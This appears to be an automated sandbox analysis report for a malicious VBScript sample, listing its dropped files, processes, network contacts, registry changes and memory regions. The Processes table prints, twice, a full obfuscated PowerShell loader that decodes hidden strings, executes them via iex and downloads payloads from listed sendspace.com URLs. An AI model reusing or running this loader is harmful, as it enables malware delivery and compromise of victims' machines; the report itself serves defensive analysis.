Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
time.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3582-490\wab.exe
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ipzz4ah.drh.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ncp0hsh.0ab.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jwj3x4nf.4vm.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nazlfk0t.rme.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\tmp5023.tmp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Omrystninger.Dim
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\time.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function
Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke(
$Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene
' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio
Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev
DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0
ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene
'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels
Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr
W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene
'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon
,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. PromtFore xstat,tGaypo
Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem
iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf
Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc
RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD
Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa
Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb
');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.=
Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli(
Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl
Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCingueEnstauDjellrBonde=GleamN ,elfe Bifew So.a-ugestOU.derb DisejAbeloe
SunbcBlowjtGerha Re,seSFrejdy Knogs NatitDuk,eeDro.dmBacch.UnderNBilleePa,aptRedis.ThwarWConiieCholebBetteCChatslanth.iExempeRig
enGapgltLov,a ');Kolesterol (Lnkampene 'Desig$ForreBudebla IsocdCitesiTil,sn.edaleCyb ruS kverUbluf.S.preH.gtnie,inteaSpe,edPateteBur.nrskadesBayon[Alask$LedigOOdinerTapisgNonapaVindknDe
peiS rensspecim FruieCenterDegassGuilb],perm=kiloc$.edboScapsikGldssoSicklvU rembWrestrHusblas,phonD.moud Un,vssearcbLindgePlangk
ParamCalvipTallie Ruinl ProtsReklaeRinghs Sg,f ');$Frakoblende127=Lnkampene 'ImproBSightaS.vsadAntipi MetanNonane Ejeru .uggr
Spil. skraDKraknoGemenwAntipn eroslOutfeo BefuaShakedVerruFNintui Armel A.paeDebat(Wilda$S.ineSBe prkB rdsaPhoohd Evo eTre
jvtjeneoSl,evl AdjodByzaneDamebrStboln.ofdieSemim,Spytk$HumorEFin.nk C,rbvPi.laiBougap Afmae avebr Fyrai SikanMutedgM more
Strar Goddn,uneneConfu)Bespn ';$Frakoblende127=$Bnke[1]+$Frakoblende127;$Ekviperingerne=$Bnke[0];Kolesterol (Lnkampene 'Reall$HerlugThur,lTrommoSkrmsbGammiaKltrildrjed:UdspeVKansaichurrnToxicd
timaiElektggyrit=Trill(WeheeT gemme.italsCapybtP.rli- ,ccePrevisaSti.ltGevanhPeyot Parce$KosttE Bi lkBodgev JyndikailypProdue,rallrUnm.diN.nrenSammegEnd
ce HashrGliomnUndereGymno)Desme ');while (!$Vindig) {Kolesterol (Lnkampene 'Merce$Pr vagPrdiklClisto Forkb rieaTra dl .els:BeskyVHydr.eUnionn
ranstBedvee PallkS mfuj.pgatoSrge.lUneneeBintjnmegal= Fjo.$ sandt,dblor efreuTaleseampli ') ;Kolesterol $Frakoblende127;Kolesterol
(Lnkampene 'TilskSRokketNed,uaUlde r,emictlanda-HimmeS WicklPurpoeU,frseAct,apProvi L.ndb4Ajour ');Kolesterol (Lnkampene 'Mo.he$Impovg
Unf l Mo,ioS.bpebGryntaFibr lBromi: U,ivVSlubriStuklnOmbindHyperiDrivag.egit= .ost(T,vemTAtom e andos ,vertVandi-JenkrPtjeneaReamatHamsthOvers
Bj.ne$Hyp,nEKolpokRegulvlameligolilpSangveFolkerC ickiJordrnNelisgCeremeMultirTi lbn AfdeePet r)Pre.u ') ;Kolesterol (Lnkampene
'Odori$AgerbgSubselO teto S,deb,orinaMonumlS mme:KbekrRMgle.eStibis Tobau Fin,sDrbercMontiiR.sertSeksuaInvesnHi.litKeram=Kroni$TaktrgRagsolGenn,oWiyatbSt,afaRygsjlF.lde:S
udrRv,rmoeUnchasSqualpHenwois.ederKedloaUdtaltBrevaiBo,ennDisarg aafr+ Cho,+Antih%antia$Unsq R PaksuOmgrdfUnfu.fEngleeReindrRetrosKonsuk
Socee IrrerTakah.EuklicKo.stoFeticusank,nRingetFr,ss ') ;$Skadevolderne=$Ruffersker[$Resuscitant];}$Stealth=317356;$Smeltediglen=28607;Kolesterol
(Lnkampene 'Col,u$,flivgs,ratlExploo La,hbBarosaP,olol,arco:Hvse.ORunprlMindaeRundsrtetr.aNonadcOmegneNdri,oCaud uSav ns,arbu
Circu=bred, TiltnGundereover.tOrals-HaglsCTmreroClinon CenttTilfleVedrrnKle,itPromo Caram$Pale.ESaarsk ForkvTophaiForsmpExte
eMoralr,kudsi.rasonTugbog.himoeKommir ondenSubtoecoutu ');Kolesterol (Lnkampene 'Nonme$.dsmigDej klUnle oforskbSheeta Tastl
A lg:,nkebL Bru,hD nskuPostonAbe,idScolys Srad ,ejlt=Kasta Subst[GalloS.havayMaksisGradst T aneS ejlmI.elr.Ol erC EchooPsam,n,olkevAprjteApinarNoum
tPrees] Vege:Local:Cal,rFBjninrDekreo Ald mEp,ncB NaiaaU,ryksUlykkeUnseg6Laund4 ,estSM.nottOmnidr CohoiJambonFaraog efor(udl,d$.atonOIsokol
usleFrontr.elata Aktic SpoueCesiuo ligauTotemsBar.e) Bac. ');Kolesterol (Lnkampene 'Ae th$.rikkg,arbel .eneo KontbVa.utaSu
lelBlomk:Pr,nkSRgforuTiskdbBalkogS.btrr AberoUnoveuYeastpMicrosNeome B ill=Slag, Unsto[Dia,lS Metoy boghsEx,ostForbee Ka fmDr.ek.OsteaT
Safte.refaxBundgtSyndi.Une.tE,erminIndimcR sunoJessed ForniFlodhn R,tigArcad]Bygrn:Speci:FlugtA adipSStrobCBemgtIRadenI.lust.EkspeG
ipleI,hestGydn,SSpredtGrantr ,ppliDeas,nChmilgPo en(Besla$ BlodL Tr,ahDemaruBa.esnKnowhdBade.sKunde)V,rol ');Kolesterol (Lnkampene
't.esi$PreregKvidrlNo.imo PrisbJawfia Thi,l Eksp:Cru hKL.skojBrugeoM,saprorbict Lys eTrundlT legeBlanknSinapsVel,e=Su,er$.egadSW.incuSoffibResergBrachrPannio.ejdiuEnceppDecigs
Avis. SpaesN ggauCominbDagsrs ap ltP,ilorFre riIdocrnHabi.gConse(Kobiu$ KribSPo emt.lpaseSothiaPrelalSto it S rahInte ,Kumme$T.bleSMonosmR,esueAfkorlN.ttetEfterePrveld
K.ruiMethagNukasl Sowde Inven,uleb)Modta ');Kolesterol $Kjortelens;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function
Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke(
$Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene
' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio
Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev
DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0
ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene
'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels
Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr
W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene
'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon
,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. PromtFore xstat,tGaypo
Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem
iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf
Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc
RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD
Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa
Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb
');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.=
Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli(
Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl
Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCingueEnstauDjellrBonde=GleamN ,elfe Bifew So.a-ugestOU.derb DisejAbeloe
SunbcBlowjtGerha Re,seSFrejdy Knogs NatitDuk,eeDro.dmBacch.UnderNBilleePa,aptRedis.ThwarWConiieCholebBetteCChatslanth.iExempeRig
enGapgltLov,a ');Kolesterol (Lnkampene 'Desig$ForreBudebla IsocdCitesiTil,sn.edaleCyb ruS kverUbluf.S.preH.gtnie,inteaSpe,edPateteBur.nrskadesBayon[Alask$LedigOOdinerTapisgNonapaVindknDe
peiS rensspecim FruieCenterDegassGuilb],perm=kiloc$.edboScapsikGldssoSicklvU rembWrestrHusblas,phonD.moud Un,vssearcbLindgePlangk
ParamCalvipTallie Ruinl ProtsReklaeRinghs Sg,f ');$Frakoblende127=Lnkampene 'ImproBSightaS.vsadAntipi MetanNonane Ejeru .uggr
Spil. skraDKraknoGemenwAntipn eroslOutfeo BefuaShakedVerruFNintui Armel A.paeDebat(Wilda$S.ineSBe prkB rdsaPhoohd Evo eTre
jvtjeneoSl,evl AdjodByzaneDamebrStboln.ofdieSemim,Spytk$HumorEFin.nk C,rbvPi.laiBougap Afmae avebr Fyrai SikanMutedgM more
Strar Goddn,uneneConfu)Bespn ';$Frakoblende127=$Bnke[1]+$Frakoblende127;$Ekviperingerne=$Bnke[0];Kolesterol (Lnkampene 'Reall$HerlugThur,lTrommoSkrmsbGammiaKltrildrjed:UdspeVKansaichurrnToxicd
timaiElektggyrit=Trill(WeheeT gemme.italsCapybtP.rli- ,ccePrevisaSti.ltGevanhPeyot Parce$KosttE Bi lkBodgev JyndikailypProdue,rallrUnm.diN.nrenSammegEnd
ce HashrGliomnUndereGymno)Desme ');while (!$Vindig) {Kolesterol (Lnkampene 'Merce$Pr vagPrdiklClisto Forkb rieaTra dl .els:BeskyVHydr.eUnionn
ranstBedvee PallkS mfuj.pgatoSrge.lUneneeBintjnmegal= Fjo.$ sandt,dblor efreuTaleseampli ') ;Kolesterol $Frakoblende127;Kolesterol
(Lnkampene 'TilskSRokketNed,uaUlde r,emictlanda-HimmeS WicklPurpoeU,frseAct,apProvi L.ndb4Ajour ');Kolesterol (Lnkampene 'Mo.he$Impovg
Unf l Mo,ioS.bpebGryntaFibr lBromi: U,ivVSlubriStuklnOmbindHyperiDrivag.egit= .ost(T,vemTAtom e andos ,vertVandi-JenkrPtjeneaReamatHamsthOvers
Bj.ne$Hyp,nEKolpokRegulvlameligolilpSangveFolkerC ickiJordrnNelisgCeremeMultirTi lbn AfdeePet r)Pre.u ') ;Kolesterol (Lnkampene
'Odori$AgerbgSubselO teto S,deb,orinaMonumlS mme:KbekrRMgle.eStibis Tobau Fin,sDrbercMontiiR.sertSeksuaInvesnHi.litKeram=Kroni$TaktrgRagsolGenn,oWiyatbSt,afaRygsjlF.lde:S
udrRv,rmoeUnchasSqualpHenwois.ederKedloaUdtaltBrevaiBo,ennDisarg aafr+ Cho,+Antih%antia$Unsq R PaksuOmgrdfUnfu.fEngleeReindrRetrosKonsuk
Socee IrrerTakah.EuklicKo.stoFeticusank,nRingetFr,ss ') ;$Skadevolderne=$Ruffersker[$Resuscitant];}$Stealth=317356;$Smeltediglen=28607;Kolesterol
(Lnkampene 'Col,u$,flivgs,ratlExploo La,hbBarosaP,olol,arco:Hvse.ORunprlMindaeRundsrtetr.aNonadcOmegneNdri,oCaud uSav ns,arbu
Circu=bred, TiltnGundereover.tOrals-HaglsCTmreroClinon CenttTilfleVedrrnKle,itPromo Caram$Pale.ESaarsk ForkvTophaiForsmpExte
eMoralr,kudsi.rasonTugbog.himoeKommir ondenSubtoecoutu ');Kolesterol (Lnkampene 'Nonme$.dsmigDej klUnle oforskbSheeta Tastl
A lg:,nkebL Bru,hD nskuPostonAbe,idScolys Srad ,ejlt=Kasta Subst[GalloS.havayMaksisGradst T aneS ejlmI.elr.Ol erC EchooPsam,n,olkevAprjteApinarNoum
tPrees] Vege:Local:Cal,rFBjninrDekreo Ald mEp,ncB NaiaaU,ryksUlykkeUnseg6Laund4 ,estSM.nottOmnidr CohoiJambonFaraog efor(udl,d$.atonOIsokol
usleFrontr.elata Aktic SpoueCesiuo ligauTotemsBar.e) Bac. ');Kolesterol (Lnkampene 'Ae th$.rikkg,arbel .eneo KontbVa.utaSu
lelBlomk:Pr,nkSRgforuTiskdbBalkogS.btrr AberoUnoveuYeastpMicrosNeome B ill=Slag, Unsto[Dia,lS Metoy boghsEx,ostForbee Ka fmDr.ek.OsteaT
Safte.refaxBundgtSyndi.Une.tE,erminIndimcR sunoJessed ForniFlodhn R,tigArcad]Bygrn:Speci:FlugtA adipSStrobCBemgtIRadenI.lust.EkspeG
ipleI,hestGydn,SSpredtGrantr ,ppliDeas,nChmilgPo en(Besla$ BlodL Tr,ahDemaruBa.esnKnowhdBade.sKunde)V,rol ');Kolesterol (Lnkampene
't.esi$PreregKvidrlNo.imo PrisbJawfia Thi,l Eksp:Cru hKL.skojBrugeoM,saprorbict Lys eTrundlT legeBlanknSinapsVel,e=Su,er$.egadSW.incuSoffibResergBrachrPannio.ejdiuEnceppDecigs
Avis. SpaesN ggauCominbDagsrs ap ltP,ilorFre riIdocrnHabi.gConse(Kobiu$ KribSPo emt.lpaseSothiaPrelalSto it S rahInte ,Kumme$T.bleSMonosmR,esueAfkorlN.ttetEfterePrveld
K.ruiMethagNukasl Sowde Inven,uleb)Modta ');Kolesterol $Kjortelens;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Omrystninger.Dim && echo $"
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Omrystninger.Dim && echo $"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/exw2o1P
|
unknown
|
||
|
https://go.microsoft.c
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/exw2o1
|
172.67.170.105
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/dvbcvt
|
172.67.170.105
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://fs13n4.sendspaX
|
unknown
|
||
|
https://fs12n1.sendspace.com/dlpro/abb1ac42d6f7e317093ecbc9d7acfd44/664f6ddc/dvbcvt/TGFVxUhEOgecNvM13.bin
|
69.31.136.53
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/exw2o1XR
|
unknown
|
||
|
https://fs13n4.sendspace.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://www.sendspace.com
|
unknown
|
||
|
https://fs13n4.sendspace.com/dlpro/34b20cf0440cef8a4c2d2511415a2b43/664f6da6/exw2o1/Croutons.xtp
|
69.31.136.57
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.sendspace.com
|
unknown
|
||
|
http://fs13n4.sendspace.com
|
unknown
|
There are 13 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
fs13n4.sendspace.com
|
69.31.136.57
|
||
|
fs12n1.sendspace.com
|
69.31.136.53
|
||
|
www.sendspace.com
|
172.67.170.105
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
172.67.170.105
|
www.sendspace.com
|
United States
|
||
|
69.31.136.57
|
fs13n4.sendspace.com
|
United States
|
||
|
69.31.136.53
|
fs12n1.sendspace.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
15C3E291000
|
trusted library allocation
|
page read and write
|
|
|
|
5E94000
|
trusted library allocation
|
page read and write
|
|
|
|
CC2B000
|
direct allocation
|
page execute and read and write
|
|
|
|
8B80000
|
direct allocation
|
page execute and read and write
|
|
|
|
4D63000
|
trusted library allocation
|
page read and write
|
||
|
36FC7FD000
|
stack
|
page read and write
|
||
|
2481C000
|
direct allocation
|
page read and write
|
||
|
8655000
|
trusted library allocation
|
page read and write
|
||
|
F42B000
|
direct allocation
|
page execute and read and write
|
||
|
287A1EE5000
|
heap
|
page read and write
|
||
|
289B2FF000
|
stack
|
page read and write
|
||
|
7FFD9B6C2000
|
trusted library allocation
|
page read and write
|
||
|
287A1E3C000
|
heap
|
page read and write
|
||
|
90B0000
|
direct allocation
|
page read and write
|
||
|
768C000
|
heap
|
page read and write
|
||
|
24828000
|
direct allocation
|
page read and write
|
||
|
7A40000
|
trusted library allocation
|
page read and write
|
||
|
2444F000
|
stack
|
page read and write
|
||
|
15C46936000
|
heap
|
page read and write
|
||
|
295C000
|
heap
|
page read and write
|
||
|
238D000
|
heap
|
page read and write
|
||
|
287A3C70000
|
heap
|
page read and write
|
||
|
E02B000
|
direct allocation
|
page execute and read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
15C2C7B6000
|
heap
|
page read and write
|
||
|
28B0000
|
heap
|
page read and write
|
||
|
36FC97E000
|
stack
|
page read and write
|
||
|
71E0000
|
direct allocation
|
page read and write
|
||
|
287A1F75000
|
heap
|
page read and write
|
||
|
2950000
|
heap
|
page read and write
|
||
|
36FC77E000
|
stack
|
page read and write
|
||
|
767B000
|
heap
|
page read and write
|
||
|
243CF000
|
stack
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
36FC8FE000
|
stack
|
page read and write
|
||
|
15C2E75A000
|
trusted library allocation
|
page read and write
|
||
|
8BB0000
|
direct allocation
|
page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
|
2332000
|
heap
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
287A3CB6000
|
heap
|
page read and write
|
||
|
E5A92FE000
|
stack
|
page read and write
|
||
|
E5A90F9000
|
stack
|
page read and write
|
||
|
287A3CA8000
|
heap
|
page read and write
|
||
|
143C8150000
|
heap
|
page read and write
|
||
|
15C30207000
|
trusted library allocation
|
page read and write
|
||
|
15C2E2A6000
|
trusted library allocation
|
page read and write
|
||
|
5D69000
|
trusted library allocation
|
page read and write
|
||
|
4A30000
|
trusted library allocation
|
page read and write
|
||
|
7AB0000
|
trusted library allocation
|
page read and write
|
||
|
2481C000
|
direct allocation
|
page read and write
|
||
|
15C2F7AF000
|
trusted library allocation
|
page read and write
|
||
|
143C7DF0000
|
heap
|
page read and write
|
||
|
15C4693E000
|
heap
|
page read and write
|
||
|
2481C000
|
direct allocation
|
page read and write
|
||
|
76BC000
|
heap
|
page read and write
|
||
|
15C2C5E0000
|
heap
|
page read and write
|
||
|
15C30429000
|
trusted library allocation
|
page read and write
|
||
|
287A1EE9000
|
heap
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
15C30459000
|
trusted library allocation
|
page read and write
|
||
|
5D29000
|
trusted library allocation
|
page read and write
|
||
|
15C2C6E0000
|
heap
|
page read and write
|
||
|
36FCD7E000
|
stack
|
page read and write
|
||
|
31FE000
|
stack
|
page read and write
|
||
|
24830000
|
direct allocation
|
page read and write
|
||
|
7FFD9B6D0000
|
trusted library allocation
|
page read and write
|
||
|
36FC3B3000
|
stack
|
page read and write
|
||
|
7FFD9B7E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
15C2E080000
|
heap
|
page execute and read and write
|
||
|
287A1EF7000
|
heap
|
page read and write
|
||
|
287A3B97000
|
heap
|
page read and write
|
||
|
90E0000
|
direct allocation
|
page read and write
|
||
|
7B00000
|
trusted library allocation
|
page read and write
|
||
|
287A1E40000
|
heap
|
page read and write
|
||
|
7877000
|
trusted library allocation
|
page read and write
|
||
|
8863000
|
heap
|
page read and write
|
||
|
2481C000
|
direct allocation
|
page read and write
|
||
|
7FFD9B8B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
78B0000
|
trusted library allocation
|
page read and write
|
||
|
24830000
|
direct allocation
|
page read and write
|
||
|
7728000
|
heap
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
143C8155000
|
heap
|
page read and write
|
||
|
2481C000
|
direct allocation
|
page read and write
|
||
|
E5A95FE000
|
stack
|
page read and write
|
||
|
287A1EF9000
|
heap
|
page read and write
|
||
|
15C4672A000
|
heap
|
page read and write
